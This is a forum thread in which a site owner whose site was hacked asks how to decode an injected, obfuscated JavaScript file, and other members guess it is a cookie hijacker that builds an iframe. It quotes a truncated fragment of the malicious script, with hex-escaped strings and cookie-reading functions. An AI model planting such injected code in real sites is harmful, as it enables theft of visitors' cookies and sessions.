3 replies to this topic

[JohnnyDoomo]

I'm looking for a smart online javascript decoder.

My site was recently hacked and I'm looking to figure out what a javascript file is doing that didn't match my original, and it has obfuscated code in it.

I say a smart decoder, because it seems that parts of the code are encoded and others aren't. I've tried inserting it into all types of online decoders that come up with Google but they all through out errors instead of decode the parts that are in hex / base64.

I hesitate inserting the code here if for no other reason than that on my site it created an iframe, and if that code is posted publicly, I didn't want that site to get any more promotion or this phpfreaks account be linked to that website.

However, if this is the only way, I would be willing to PM someone to decode it for me, as I'm not a coder that can get javascript to write out what it's doing.

Does anybody have better de-obfuscation websites than what are on the first page of google?

Here's a sample of what the obfuscated code looks like:

var NRH9="use\x72\x69\x64A\x3081\x37\x46B25";var oy3Al="27";var ab9RvC=1;var EJ_a;function K5N8T(HhRkaFs){var qu24;var RVy9q=document.cookie;if(!RVy9q){return null;}RVy9q=RVy9q.replace(/\s/g,"");var qxtJhjG=RVy9q.split(";");for(var i=0;i<qxtJhjG.length;i++){var jyl8E=qxtJhjG[i].split("=");if(jyl8E[0]==HhRkaFs){qu24=unescape(jyl8E[1]);break;}}return qu24;};function yJoulC(HhRkaFs,Omd1n,OR4TxKq){var exp=new Date();var AJdUl=exp.getTime()+(OR4TxKq*60*60*1000)

Thanks for any help!

[Xaotique]

It's just a string in hex that I see. The rest is regular JS? And it looks like it's just a cookie/session hijacker. You should reset all users passwords and provide new login codes if you use a cookie and set it. If you set plain cookie for user and pass, then he has passwords, but you should have everything encrypted like that for the safety of your users.

[JohnnyDoomo]

My site has no user registration system.

The rest of the code is similar jibberish to me. That's just the first part of the encrypted code. There was an iframe being generated as well on pages, which I can make out the iframe code in the jibberish as it has rame with the hex code for the "i" and the "f".

As I said, I don't want to post the whole thing publicly, but I'm interested in knowing what the rest of the code was doing.

[Xaotique]

Most likely it appends an iframe to the page with the source linking to a page he owns. It then probably has cookies as parameters in order to log it.

If there is no use of cookies on your site, including for yourself (for example an admin panel), then I don't know. If there is, that's most likely what they're after.

You didn't really give us much to go on.